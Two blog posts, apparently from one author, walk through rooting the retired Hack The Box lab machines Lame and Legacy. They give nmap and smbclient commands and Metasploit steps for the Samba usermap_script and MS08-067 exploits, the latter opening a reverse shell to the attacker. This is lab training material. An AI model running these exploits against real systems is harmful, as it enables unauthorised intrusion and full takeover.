How I hacked the Linux machine Lame on HTB

In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).

In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).

Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.

The first step for this hack is to scan the Lame machine in order to identify its open ports. We run nmap -A -T4 -p- 10.10.10.3

We scan for open ports and we get all the information available on the services that are running behind those ports.

The result shows us that there are five open ports and four services running behind them:

  • FTP (21): File Transfer Protocol. nmap shows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
  • SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
  • DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
  • SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy. nmap shows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.

Firstly, we run smbclient -L \\\\10.10.10.3\\

We have access to the share names.

The result in the screenshot tells us that can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into ADMIN$, we would have very good chances of exploiting this machine. Run smbclient \\\\10.10.10.3\\ADMIN$

We cannot access the ADMIN share.

Unfortunately, access to this folder is denied (same result for print$ and opt$, whereas we can get access to IPS$ but we cannot neither ls nor cd). The remaining folder is tmp. Here we do not get access to vmware-root, and files .X0-lock and vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files on my machine with smbget -R smb://10.10.10.3/tmp, as cat didn’t work on SMB.

Now open your browser, go to Google and search samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that using the non-default “username map script” configuration option, we can specify a username containing shell meta characters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.

Exploit Lame and Catch the Flags

Enter use exploit/multi/samba/usermap_script , set rhosts 10.10.10.3 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

We are root on Lame!

We are in! We are the root user on the machine Lame. Now you just have to find the two flags for users root and makis. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Legacy! How I hacked my first machine on HTB

In this blog post, I will show the steps that I took to get root access to the Legacy machine on Hack The Box (HTB).

In this blog post, I will show the steps that I took to get root access to the Legacy machine on Hack The Box (HTB).

Legacy is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

In order to connect to the HTB network, open a terminal tab, go to the folder where you downloaded the connection pack, type openvpn <yourUsername>.ovpn. If you see the line Initialization Sequence Completed, you are good to go. Now open a new terminal tab and type ifconfig. You should see an entry called tun0, which is the name of the VPN interface. Write down the relative IPv4 address, we will need it later.

Scanning and Enumeration

In real life, the first step for a penetration test is information gathering. During this phase, the pentester gathers information about the target. Because we are hacking a machine on HTB, we will limit ourselves to write down Legacy’s operative system (Legacy is a Windows machine) and its IPv4 address. This information can be found at https://www.hackthebox.eu/home/machines under Retired Machines > Legacy.

The next step of the pentest process is scanning and enumeration. Here the pentester wants to know which ports on the victim machine are open, that is, which ports are configured to receive packets. Moreover, s/he looks at the services listening on those ports, looks for unpatched vulnerabilities and so on. For scanning and enumeration we are going to use nmap, smbclient (spoiler alert: we are going to exploit a SMB weakness) and metasploit.

Open a new terminal tab and enter nmap -T4 -p- 10.10.10.4 . With this command, we are going to scan all ports on machine 10.10.10.4 (Legacy) with timing 4 (timing is in range 0-5, where higher is faster).

We just look for open ports as first step.

This first scan tells us that ports 139/445 (SMB) and 3389 (RDP) are open. Now that we know this, let’s list more information about them. Enter nmap -A -T4 -p 139,445,3389 10.10.10.4 , where -A lists all the information available for each specified port.

Now we get more information for ports 139/445 and 3389.

The most important information that we get from this second scan is that the target computer is running Windows XP (you see this information under smb-os-discovery).

Now we will focus on SMB which is a network file sharing protocol that has been vulnerable on Windows in the past. Our goal is to gather information about SMB on this machine. The first thing we can do is try accessing SMB resources on the target. Enter smbclient -L \\\\10.10.10.4\\

Our goal is to access SMB file shares on Legacy.

This attempt was unsuccessful, because the login is protected by a password. The next thing we can try is to find out which SMB version Legacy is running. In order to do this, we will use Metasploit. Run msfconsole to start the service. Then enter search smb. As we are looking for the SMB version, we enter use auxiliary/scanner/smb/smb_version. Now we set up the remote host with set rhosts 10.10.10.4 and run this program.

We scan in order to find out the SMB version.

Unfortunately, we do not get any information about the SMB version, but we get to learn that the host is running Service Package 3 of Windows XP. This is an important finding, because it allows us to look for an exploit for a specific service pack.

Now open your browser, go to Google and search smb windows XP SP3 exploit. One of the first pages that show up is https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi . Rapid7 pages are very helpful as they explain the specific vulnerability and show you the commands that you have to run with Metasploit in order to exploit that vulnerability. The reason behind this “service” is that the Metasploit Project is a collaboration between the open source community and the company Rapid7.

Exploit Legacy and Catch the Flags

It is time to hack into Legacy. In this exploit, we are going to open a reverse shell. This means that the victim connects back to us (the attacker). This image by https://www.hackingtutorials.org/ visualizes this concept:

The idea behind a reverse shell.

Enter use exploit/windows/smb/ms08_067_netapi and then set up RHOST (the victim’s IP address) and LHOST (the attacker’s IP address). This step is very important as the default settings use your machine default IP address as LHOST (it took a while for me to find this problem), whereas you need the tun0 IPv4 address in order to hack into Legacy successfully. Enter set rhosts 10.10.10.4 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

The exploit was successful and we are now NT AUTHORITY\SYSTEM.

If everything worked fine, you should see something similar to the screenshot above. NT AUTHORITY\SYSTEM means that we now have the highest privilege level in Windows, which is equivalent to the root user in Linux. Next you have to look for user “john”‘s and user “Administrator”‘s flags and submit them on HTB in order to own the Legacy machine. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!